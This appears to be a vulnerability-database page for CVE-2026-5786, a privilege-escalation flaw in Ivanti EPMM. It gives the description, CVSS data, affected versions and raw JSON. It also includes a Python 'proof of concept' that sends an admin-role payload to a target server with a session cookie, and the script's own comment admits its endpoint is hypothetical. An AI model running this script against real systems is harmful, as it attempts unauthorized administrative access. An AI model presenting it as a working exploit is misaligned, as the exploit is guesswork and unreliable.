Security Vulnerability Report
中文
CVE-2026-5786 CVSS 8.8 HIGH

CVE-2026-5786

Published: 2026-05-07 16:16:22
Last Modified: 2026-05-07 20:12:48
Source: 3c1d8aa1-5a33-4ea4-8992-aadd6440af75

Description

An Improper Access Control vulnerability in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote authenticated attacker to gain administrative access.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager_mobile:12.7.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ivanti:endpoint_manager_mobile:12.8.0.0:*:*:*:*:*:*:* - VULNERABLE
Ivanti EPMM < 12.6.1.1
Ivanti EPMM < 12.7.0.1
Ivanti EPMM < 12.8.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-5786 # This script demonstrates the privilege escalation vulnerability. # Usage: python3 poc.py <target_url> <session_cookie> import requests import sys if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <cookie>") sys.exit(1) target = sys.argv[1].rstrip('/') cookie = sys.argv[2] # The vulnerable endpoint that allows role modification without proper authorization # Endpoint is hypothetical based on typical EPMM structures vuln_endpoint = f"{target}/mics/users/self/upgrade" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Cookie": f"JSESSIONID={cookie}", "Content-Type": "application/json" } # Payload to grant administrative privileges payload = { "role": "admin", "permissions": ["read", "write", "execute", "admin"] } try: print(f"[*] Attempting to exploit {target}...") response = requests.post(vuln_endpoint, json=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Privileges escalated.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status Code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5786", "sourceIdentifier": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "published": "2026-05-07T16:16:22.483", "lastModified": "2026-05-07T20:12:47.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Access Control vulnerability in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote authenticated attacker to gain administrative access."}], "metrics": {"cvssMetricV31": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.6.1.1", "matchCriteriaId": "940E9259-A59E-4424-8B2E-05571C4B78AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager_mobile:12.7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "79879C08-959D-49BD-947C-914F82B564E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ivanti:endpoint_manager_mobile:12.8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "EAB6A5F3-3F82-41BF-B7C6-8F4F0E813B9F"}]}]}], "references": [{"url": "https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs", "source": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75", "tags": ["Vendor Advisory", "Patch"]}]}}